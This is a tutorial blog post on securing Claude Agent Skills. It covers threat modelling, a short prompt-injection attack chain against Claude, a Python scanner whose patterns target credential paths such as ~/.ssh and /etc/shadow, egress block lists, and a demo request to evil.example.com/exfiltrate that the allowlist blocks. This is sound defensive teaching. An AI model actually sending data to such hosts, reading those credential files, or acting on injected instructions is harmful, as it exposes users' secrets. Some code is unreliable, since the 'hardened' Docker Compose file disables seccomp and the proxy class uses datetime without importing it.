In Part 5, we covered enterprise deployment and management of Claude Agent Skills. Now we address the critical topic of security. Agent Skills provide powerful capabilities, but with that power comes responsibility. This comprehensive guide covers threat modeling, skill auditing, sandboxing techniques, credential management, and defense-in-depth strategies to protect your organization from security risks while maintaining the productivity benefits of Skills.
Understanding the Security Landscape
In 2025, the security landscape for AI agents has matured significantly. As industry analysts note, the focus has shifted from “Is Claude safe?” to “How do we design permissions, isolate execution, govern data, and monitor agentic behavior?” Successful deployments treat Skills like software components with least privilege by default, explicit action gates, audited supply chains, and continuous monitoring.
Key Security Challenges
Agent Skills introduce several security considerations that differ from traditional application security:
- Skills execute code with the same permissions as the user or container
- Malicious skills can direct Claude to exfiltrate data or take unintended actions
- Supply chain exposure through third-party or shared skills with risky dependencies
- Shadow AI and data sprawl from unmanaged skills and OAuth scopes
- Prompt injection attacks that manipulate skill behavior
- Business logic vulnerabilities that AI cannot detect
- Data residency and compliance requirements (GDPR, HIPAA, SOC 2)
According to Anthropic’s 2025 threat intelligence reports, organized misuse campaigns have adopted tooling that resembles legitimate agent workflows, making detection increasingly complex. This requires robust controls and response playbooks.
Threat Modeling for Agent Skills
Effective security begins with understanding potential threats. Use this structured approach to threat modeling:
STRIDE Threat Model for Skills
Spoofing Identity:
- Threat: Malicious skill impersonates trusted organizational skill
- Mitigation: Digital signatures, trusted repositories, version control
- Risk Level: Medium
Tampering with Data:
- Threat: Skill modifies sensitive data without authorization
- Mitigation: Read-only mode, explicit approval workflows, audit logging
- Risk Level: High
Repudiation:
- Threat: Actions taken by skill cannot be traced to specific user
- Mitigation: Comprehensive audit trails, user attribution, timestamping
- Risk Level: Medium
Information Disclosure:
- Threat: Skill exfiltrates confidential data to external endpoints
- Mitigation: Network isolation, egress filtering, data classification
- Risk Level: Critical
Denial of Service:
- Threat: Malicious skill consumes excessive resources
- Mitigation: Resource limits, timeout controls, rate limiting
- Risk Level: Low
Elevation of Privilege:
- Threat: Skill gains access beyond intended scope
- Mitigation: Principle of least privilege, capability-based security
- Risk Level: HighAttack Vectors and Scenarios
Scenario 1: Malicious Skill Installation
Attack Chain:
1. Attacker creates skill with seemingly legitimate functionality
2. Skill includes hidden code that exfiltrates sensitive files
3. Developer installs skill from untrusted source
4. Skill activates on normal usage, exfiltrating data
Prevention:
- Install skills only from trusted sources (Anthropic, verified partners)
- Require security review before installation
- Implement network egress controls
- Monitor for unusual file access patternsScenario 2: Supply Chain Compromise
Attack Chain:
1. Legitimate skill depends on external library
2. Library maintainer account is compromised
3. Malicious code injected into library update
4. Organizations automatically pull compromised version
Prevention:
- Pin dependency versions explicitly
- Review dependency changes before updates
- Use private package mirrors with security scanning
- Implement software bill of materials (SBOM) trackingScenario 3: Prompt Injection via Skill
Attack Chain:
1. Skill processes external data (user uploads, API responses)
2. Attacker embeds malicious instructions in data
3. Skill passes tainted data to Claude
4. Claude executes unintended actions
Prevention:
- Sanitize all external inputs
- Use structured data formats (JSON) over free text
- Implement input validation in skill scripts
- Separate instruction context from data contextSkill Auditing and Review Process
Thorough auditing is your first line of defense. Every skill should undergo security review before deployment.
Pre-Deployment Security Checklist
1. Source and Provenance Review
- Verify skill source (Anthropic official, verified partner, internal development)
- Check digital signatures if available
- Review commit history if from version control
- Identify all contributors and maintainers
- Assess trustworthiness of external dependencies
2. Code and Content Analysis
- Read SKILL.md for stated functionality and scope
- Review all bundled scripts for malicious patterns
- Check for hardcoded credentials or secrets
- Identify network calls to external endpoints
- Analyze file system access patterns
- Review environment variable usage
3. Dependency Analysis
- List all external dependencies (Python packages, npm modules)
- Check for known vulnerabilities (CVE databases)
- Verify dependency licenses for compliance
- Review dependency update frequency and maintenance
- Assess supply chain risk for each dependency
Automated Security Scanning
Implement automated scanning to catch common vulnerabilities:
Python: Skill Security Scanner
import os
import re
import yaml
import subprocess
from pathlib import Path
from typing import List, Dict, Set
class SkillSecurityScanner:
"""Automated security scanner for Claude Agent Skills"""
DANGEROUS_PATTERNS = [
r'eval\s*\(', # Arbitrary code execution
r'exec\s*\(', # Arbitrary code execution
r'__import__\s*\(', # Dynamic imports
r'os\.system\s*\(', # Shell command execution
r'subprocess\.(call|run|Popen)', # Shell command execution
r'requests\.(get|post)', # Network requests
r'urllib\.request', # Network requests
r'socket\.', # Network sockets
r'pickle\.loads', # Unsafe deserialization
r'yaml\.load\(', # Unsafe YAML loading
r'base64\.b64decode', # Potential obfuscation
]
SENSITIVE_PATHS = [
r'~/.ssh',
r'~/.aws',
r'/etc/passwd',
r'/etc/shadow',
r'\.env',
r'\.git/config',
]
def __init__(self, skill_path: str):
self.skill_path = Path(skill_path)
self.findings: List[Dict] = []
def scan(self) -> Dict:
"""Run comprehensive security scan"""
print(f"Scanning skill: {self.skill_path.name}")
# Check skill structure
self._check_structure()
# Validate YAML frontmatter
self._validate_frontmatter()
# Scan for dangerous patterns
self._scan_code_patterns()
# Check dependencies
self._check_dependencies()
# Analyze file permissions
self._check_permissions()
# Generate report
return self._generate_report()
def _check_structure(self):
"""Verify skill has proper structure"""
skill_md = self.skill_path / 'SKILL.md'
if not skill_md.exists():
self._add_finding(
severity='CRITICAL',
category='Structure',
message='Missing SKILL.md file',
file='N/A'
)
return
# Check for unexpected executable files
for file in self.skill_path.rglob('*'):
if file.is_file() and os.access(file, os.X_OK):
if file.suffix not in ['.py', '.sh', '.js']:
self._add_finding(
severity='HIGH',
category='Structure',
message=f'Unexpected executable file: {file.name}',
file=str(file.relative_to(self.skill_path))
)
def _validate_frontmatter(self):
"""Parse and validate YAML frontmatter"""
skill_md = self.skill_path / 'SKILL.md'
with open(skill_md, 'r') as f:
content = f.read()
# Extract YAML frontmatter
match = re.match(r'^---\n(.*?)\n---', content, re.DOTALL)
if not match:
self._add_finding(
severity='CRITICAL',
category='Frontmatter',
message='Missing or invalid YAML frontmatter',
file='SKILL.md'
)
return
try:
frontmatter = yaml.safe_load(match.group(1))
# Validate required fields
if 'name' not in frontmatter:
self._add_finding(
severity='HIGH',
category='Frontmatter',
message='Missing required field: name',
file='SKILL.md'
)
if 'description' not in frontmatter:
self._add_finding(
severity='HIGH',
category='Frontmatter',
message='Missing required field: description',
file='SKILL.md'
)
# Check for suspicious metadata
if 'allowed-tools' in frontmatter:
tools = frontmatter['allowed-tools']
if 'Bash' in tools or 'bash' in tools.lower():
self._add_finding(
severity='MEDIUM',
category='Permissions',
message='Skill requests bash execution privileges',
file='SKILL.md'
)
except yaml.YAMLError as e:
self._add_finding(
severity='HIGH',
category='Frontmatter',
message=f'Invalid YAML syntax: {e}',
file='SKILL.md'
)
def _scan_code_patterns(self):
"""Scan all code files for dangerous patterns"""
code_extensions = ['.py', '.js', '.sh', '.bash']
for file in self.skill_path.rglob('*'):
if file.suffix in code_extensions:
self._scan_file(file)
def _scan_file(self, file: Path):
"""Scan individual file for security issues"""
try:
with open(file, 'r', encoding='utf-8') as f:
content = f.read()
lines = content.split('\n')
# Check for dangerous patterns
for pattern in self.DANGEROUS_PATTERNS:
for line_num, line in enumerate(lines, 1):
if re.search(pattern, line):
self._add_finding(
severity='HIGH',
category='Code Pattern',
message=f'Dangerous pattern detected: {pattern}',
file=str(file.relative_to(self.skill_path)),
line=line_num,
snippet=line.strip()
)
# Check for sensitive path access
for pattern in self.SENSITIVE_PATHS:
if re.search(pattern, content):
self._add_finding(
severity='HIGH',
category='File Access',
message=f'Access to sensitive path: {pattern}',
file=str(file.relative_to(self.skill_path))
)
# Check for hardcoded secrets
secret_patterns = [
r'password\s*=\s*["\'](.+)["\']',
r'api[_-]?key\s*=\s*["\'](.+)["\']',
r'secret\s*=\s*["\'](.+)["\']',
r'token\s*=\s*["\'](.+)["\']',
]
for pattern in secret_patterns:
matches = re.finditer(pattern, content, re.IGNORECASE)
for match in matches:
self._add_finding(
severity='CRITICAL',
category='Secrets',
message='Hardcoded credential detected',
file=str(file.relative_to(self.skill_path)),
snippet=match.group(0)
)
except UnicodeDecodeError:
self._add_finding(
severity='LOW',
category='File Format',
message='Binary file or unsupported encoding',
file=str(file.relative_to(self.skill_path))
)
def _check_dependencies(self):
"""Check for dependency vulnerabilities"""
# Check Python requirements
requirements_file = self.skill_path / 'requirements.txt'
if requirements_file.exists():
try:
result = subprocess.run(
['pip-audit', '-r', str(requirements_file)],
capture_output=True,
text=True,
timeout=30
)
if result.returncode != 0:
self._add_finding(
severity='HIGH',
category='Dependencies',
message='Vulnerable dependencies detected',
file='requirements.txt',
snippet=result.stdout
)
except (subprocess.TimeoutExpired, FileNotFoundError):
self._add_finding(
severity='LOW',
category='Dependencies',
message='Could not run pip-audit (ensure pip-audit is installed)',
file='requirements.txt'
)
# Check Node.js dependencies
package_json = self.skill_path / 'package.json'
if package_json.exists():
try:
result = subprocess.run(
['npm', 'audit', '--json'],
cwd=self.skill_path,
capture_output=True,
text=True,
timeout=30
)
if result.returncode != 0:
self._add_finding(
severity='HIGH',
category='Dependencies',
message='npm audit found vulnerabilities',
file='package.json'
)
except (subprocess.TimeoutExpired, FileNotFoundError):
pass
def _check_permissions(self):
"""Check file permissions for security issues"""
for file in self.skill_path.rglob('*'):
if file.is_file():
mode = file.stat().st_mode
# Check if world-writable
if mode & 0o002:
self._add_finding(
severity='MEDIUM',
category='Permissions',
message='World-writable file detected',
file=str(file.relative_to(self.skill_path))
)
def _add_finding(self, severity: str, category: str, message: str,
file: str, line: int = None, snippet: str = None):
"""Add security finding"""
finding = {
'severity': severity,
'category': category,
'message': message,
'file': file
}
if line:
finding['line'] = line
if snippet:
finding['snippet'] = snippet
self.findings.append(finding)
def _generate_report(self) -> Dict:
"""Generate security scan report"""
severity_counts = {
'CRITICAL': 0,
'HIGH': 0,
'MEDIUM': 0,
'LOW': 0
}
for finding in self.findings:
severity_counts[finding['severity']] += 1
report = {
'skill_name': self.skill_path.name,
'scan_date': str(Path.ctime(self.skill_path)),
'total_findings': len(self.findings),
'severity_counts': severity_counts,
'findings': sorted(self.findings,
key=lambda x: ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW'].index(x['severity'])),
'risk_score': self._calculate_risk_score(severity_counts)
}
return report
def _calculate_risk_score(self, severity_counts: Dict) -> int:
"""Calculate overall risk score (0-100)"""
weights = {'CRITICAL': 25, 'HIGH': 10, 'MEDIUM': 3, 'LOW': 1}
score = sum(severity_counts[sev] * weight
for sev, weight in weights.items())
return min(score, 100)
# Example usage
if __name__ == '__main__':
scanner = SkillSecurityScanner('./skills/custom-skill')
report = scanner.scan()
print(f"\nSecurity Scan Report")
print(f"===================")
print(f"Skill: {report['skill_name']}")
print(f"Total Findings: {report['total_findings']}")
print(f"Risk Score: {report['risk_score']}/100")
print(f"\nSeverity Breakdown:")
for severity, count in report['severity_counts'].items():
print(f" {severity}: {count}")
if report['total_findings'] > 0:
print(f"\nFindings:")
for finding in report['findings']:
print(f"\n [{finding['severity']}] {finding['category']}")
print(f" File: {finding['file']}")
print(f" Message: {finding['message']}")
if 'line' in finding:
print(f" Line: {finding['line']}")
if 'snippet' in finding:
print(f" Snippet: {finding['snippet'][:100]}...")Sandboxing and Isolation Strategies
Proper isolation limits the blast radius if a skill is compromised. Implement defense-in-depth through multiple isolation layers.
Container-Based Isolation
Run skills in isolated containers with restricted permissions:
Docker Container Configuration
# Dockerfile for skill execution
FROM python:3.11-slim
# Create non-root user
RUN useradd -m -u 1000 skillrunner
# Install minimal dependencies
RUN apt-get update && apt-get install -y \
--no-install-recommends \
ca-certificates \
&& rm -rf /var/lib/apt/lists/*
# Set working directory
WORKDIR /workspace
# Copy skill files
COPY --chown=skillrunner:skillrunner skills/ /skills/
# Switch to non-root user
USER skillrunner
# Disable network by default (override if needed)
# Run with: docker run --network=none
# Set resource limits
# Run with: docker run --memory="512m" --cpus="1.0"
CMD ["python", "-m", "skill_runner"]Docker Compose with Security Hardening
version: '3.8'
services:
skill-executor:
build: .
container_name: claude-skill-sandbox
# Security options
security_opt:
- no-new-privileges:true
- seccomp:unconfined
# Read-only root filesystem
read_only: true
# Temporary filesystem for workspace
tmpfs:
- /tmp:noexec,nosuid,size=100m
- /workspace:exec,nosuid,size=500m
# Resource limits
mem_limit: 512m
cpus: 1.0
# Network isolation (no network by default)
network_mode: none
# Capabilities (drop all, add only needed)
cap_drop:
- ALL
# User
user: "1000:1000"
# Volume mounts (read-only where possible)
volumes:
- ./skills:/skills:ro
- ./output:/output:rw
# Environment variables
environment:
- PYTHONUNBUFFERED=1
- SKILL_EXECUTION_TIMEOUT=300Filesystem Restrictions
Limit skill access to specific directories:
Python: Filesystem Access Control
import os
from pathlib import Path
from typing import Set
class RestrictedFilesystem:
"""Enforce filesystem access restrictions for skills"""
def __init__(self, allowed_paths: Set[str]):
self.allowed_paths = {Path(p).resolve() for p in allowed_paths}
def is_allowed(self, path: str) -> bool:
"""Check if path access is allowed"""
target = Path(path).resolve()
# Check if path is within any allowed directory
for allowed in self.allowed_paths:
try:
target.relative_to(allowed)
return True
except ValueError:
continue
return False
def validate_access(self, path: str, operation: str = 'read'):
"""Validate and enforce access control"""
if not self.is_allowed(path):
raise PermissionError(
f"Access denied: {operation} operation on {path} not allowed"
)
# Example usage
fs = RestrictedFilesystem({
'/workspace',
'/tmp/skill-output'
})
# Intercept file operations
def safe_open(path, mode='r', **kwargs):
"""Wrapper for open() with access control"""
operation = 'write' if 'w' in mode or 'a' in mode else 'read'
fs.validate_access(path, operation)
return open(path, mode, **kwargs)
# Use in skill execution
try:
with safe_open('/workspace/data.txt', 'r') as f:
content = f.read()
except PermissionError as e:
print(f"Security violation: {e}")Credential and Secrets Management
Never hardcode credentials in skills. Use proper secrets management:
Environment Variable Best Practices
# WRONG: Hardcoded credentials
API_KEY = "sk-1234567890abcdef"
DATABASE_URL = "postgresql://user:password@host/db"
# CORRECT: Environment variables
import os
API_KEY = os.environ.get('API_KEY')
DATABASE_URL = os.environ.get('DATABASE_URL')
if not API_KEY:
raise ValueError("API_KEY environment variable not set")Integration with Secrets Managers
Node.js: AWS Secrets Manager Integration
const { SecretsManagerClient, GetSecretValueCommand } = require('@aws-sdk/client-secrets-manager');
class SecureCredentials {
constructor(region = 'us-east-1') {
this.client = new SecretsManagerClient({ region });
this.cache = new Map();
this.cacheTTL = 300000; // 5 minutes
}
async getSecret(secretName) {
// Check cache first
const cached = this.cache.get(secretName);
if (cached && Date.now() - cached.timestamp < this.cacheTTL) {
return cached.value;
}
try {
const command = new GetSecretValueCommand({
SecretId: secretName
});
const response = await this.client.send(command);
const secret = response.SecretString;
// Cache the result
this.cache.set(secretName, {
value: secret,
timestamp: Date.now()
});
return secret;
} catch (error) {
console.error(`Failed to retrieve secret ${secretName}:`, error);
throw error;
}
}
async getCredentials(credentialPath) {
const secret = await this.getSecret(credentialPath);
return JSON.parse(secret);
}
}
// Usage in skill
const credentials = new SecureCredentials();
async function initializeSkill() {
const apiKey = await credentials.getSecret('claude-skills/api-key');
const dbCreds = await credentials.getCredentials('claude-skills/database');
// Use credentials securely
// Never log or expose them
}
module.exports = { SecureCredentials };Network Security and Egress Control
Control network access to prevent data exfiltration:
Egress Filtering Strategy
Allowed Destinations:
- Anthropic API endpoints (api.anthropic.com)
- Package repositories (pypi.org, npmjs.org)
- Internal corporate APIs (*.company.com)
- Approved partner APIs (explicitly allowlisted)
Blocked Destinations:
- Personal cloud storage (dropbox.com, drive.google.com)
- Paste sites (pastebin.com, gist.github.com)
- File sharing services (transfer.sh, file.io)
- Suspicious or newly registered domains
- All other internet destinations (deny by default)Implementation: Network Proxy
Python: HTTP Proxy with Allowlist
import requests
from urllib.parse import urlparse
from typing import Set
class SecureHTTPSession:
"""HTTP session with allowlist enforcement"""
ALLOWED_DOMAINS = {
'api.anthropic.com',
'pypi.org',
'files.pythonhosted.org',
'company.internal.com',
}
def __init__(self):
self.session = requests.Session()
self.audit_log = []
def _is_allowed(self, url: str) -> bool:
"""Check if URL is allowed"""
parsed = urlparse(url)
domain = parsed.netloc.lower()
# Check exact match
if domain in self.ALLOWED_DOMAINS:
return True
# Check wildcard match
for allowed in self.ALLOWED_DOMAINS:
if allowed.startswith('*.') and domain.endswith(allowed[1:]):
return True
return False
def request(self, method: str, url: str, **kwargs):
"""Make HTTP request with security checks"""
if not self._is_allowed(url):
self._log_blocked(method, url)
raise PermissionError(
f"Network access denied: {url} not in allowlist"
)
self._log_allowed(method, url)
return self.session.request(method, url, **kwargs)
def get(self, url: str, **kwargs):
return self.request('GET', url, **kwargs)
def post(self, url: str, **kwargs):
return self.request('POST', url, **kwargs)
def _log_allowed(self, method: str, url: str):
self.audit_log.append({
'action': 'allowed',
'method': method,
'url': url,
'timestamp': str(datetime.now())
})
def _log_blocked(self, method: str, url: str):
self.audit_log.append({
'action': 'blocked',
'method': method,
'url': url,
'timestamp': str(datetime.now())
})
# Alert on blocked attempts
print(f"SECURITY ALERT: Blocked network access to {url}")
# Usage
http = SecureHTTPSession()
try:
response = http.get('https://api.anthropic.com/v1/messages')
# Succeeds
except PermissionError:
# Never reached for allowed domains
pass
try:
response = http.post('https://evil.example.com/exfiltrate')
# Raises PermissionError
except PermissionError as e:
print(f"Security violation: {e}")Monitoring and Incident Response
Continuous monitoring enables rapid detection and response to security incidents:
Security Monitoring Checklist
- Log all skill executions with user attribution
- Monitor for unusual file access patterns
- Track network egress attempts
- Alert on failed permission checks
- Monitor resource consumption anomalies
- Track skill version changes
- Log all skill installations and removals
Incident Response Playbook
Phase 1: Detection (0-5 minutes)
- Security monitoring alerts on suspicious activity
- Automated systems flag anomalous behavior
- User reports unusual skill behavior
Phase 2: Containment (5-15 minutes)
- Immediately disable affected skill organization-wide
- Isolate affected containers/environments
- Block network egress if data exfiltration suspected
- Preserve logs and evidence
Phase 3: Investigation (15-60 minutes)
- Analyze audit logs for scope of impact
- Identify affected users and data
- Review skill code and dependencies
- Determine root cause
Phase 4: Eradication (1-4 hours)
- Remove malicious skill from all systems
- Patch vulnerabilities that enabled incident
- Reset compromised credentials
- Update allowlists and security policies
Phase 5: Recovery (4-24 hours)
- Deploy patched or replacement skill if needed
- Restore normal operations
- Notify affected stakeholders
- Document lessons learned
Phase 6: Post-Incident (24-72 hours)
- Complete incident report
- Update security procedures
- Enhance monitoring based on findings
- Conduct team retrospectiveCompliance and Regulatory Considerations
GDPR Compliance
- Document data processing activities for skills
- Implement data minimization principles
- Ensure right to erasure (delete skill data)
- Maintain data processing records
- Conduct Data Protection Impact Assessments (DPIA)
HIPAA Compliance
SOC 2 Compliance
- Document skill approval and review processes
- Implement change management for skill updates
- Maintain access control matrices
- Regular security assessments and penetration testing
- Vendor risk management for third-party skills
Security Best Practices Summary
- Install skills only from trusted sources (Anthropic, verified partners, internal)
- Conduct thorough security review before any skill deployment
- Run skills in isolated containers with minimal permissions
- Use secrets managers for all credentials, never hardcode
- Implement egress filtering with explicit allowlists
- Enable comprehensive audit logging for all skill operations
- Regularly update dependencies and scan for vulnerabilities
- Maintain incident response procedures specific to AI agents
- Separate consumer and enterprise Claude usage strictly
- Conduct regular security training for skill developers
Coming Up Next
You now have comprehensive knowledge of security best practices for Claude Agent Skills, from threat modeling through incident response. In Part 7, we will explore building skills for specific use cases, providing real-world examples including financial reporting, code review automation, customer support workflows, and data analysis pipelines with complete implementation code.
References
- Skywork AI - "Are Claude Skills Secure? Threat Model, Permissions & Best Practices (2025)" (https://skywork.ai/blog/ai-agent/claude-skills-security-threat-model-permissions-best-practices-2025/)
- Reco - "Claude Security Explained: Benefits, Challenges & Compliance" (https://www.reco.ai/learn/claude-security)
- Anthropic Engineering Blog - "Equipping agents for the real world with Agent Skills" (https://www.anthropic.com/engineering/equipping-agents-for-the-real-world-with-agent-skills)
- MintMCP - "Claude Code Security: Enterprise Best Practices & Risk Mitigation" (https://www.mintmcp.com/blog/claude-code-security)
- Backslash Security - "Claude Code Security Best Practices" (https://www.backslash.security/blog/claude-code-security-best-practices)
- Eesel - "A deep dive into security for Claude Code in 2025" (https://www.eesel.ai/blog/security-claude-code)
- Claude Developer Platform - "Agent Skills Overview" (https://platform.claude.com/docs/en/agents-and-tools/agent-skills/overview)
